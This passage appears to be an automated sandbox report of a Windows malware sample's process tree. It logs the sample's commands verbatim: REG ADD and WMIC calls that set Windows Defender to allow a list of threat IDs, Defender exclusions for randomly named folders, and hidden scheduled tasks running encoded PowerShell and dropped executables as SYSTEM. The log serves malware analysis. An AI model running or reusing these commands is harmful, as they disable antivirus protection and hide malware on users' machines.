REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dIBxqmZBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dIBxqmZBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fSairMrhYOPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fSairMrhYOPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iOPoQDDXUfpqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iOPoQDDXUfpqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZVOHfyaZMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZVOHfyaZMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qLBAJgyZHGjWrPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qLBAJgyZHGjWrPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\laRuxdflOdEFherP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\laRuxdflOdEFherP\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:325⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:644⤵
- Loads dropped DLL
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qLBAJgyZHGjWrPVB /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qLBAJgyZHGjWrPVB /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\laRuxdflOdEFherP /t REG_DWORD /d 0 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\laRuxdflOdEFherP /t REG_DWORD /d 0 /reg:644⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwJDJFSIw" /SC once /ST 07:12:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwJDJFSIw"3⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwJDJFSIw"3⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 04:35:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\wDmspnJ.exe\" Nv /site_id 739435 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\eCiNxbZ.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\eCiNxbZ.exe tt /site_id 394347 /S2⤵
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Modifies data under HKEY_USERS
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
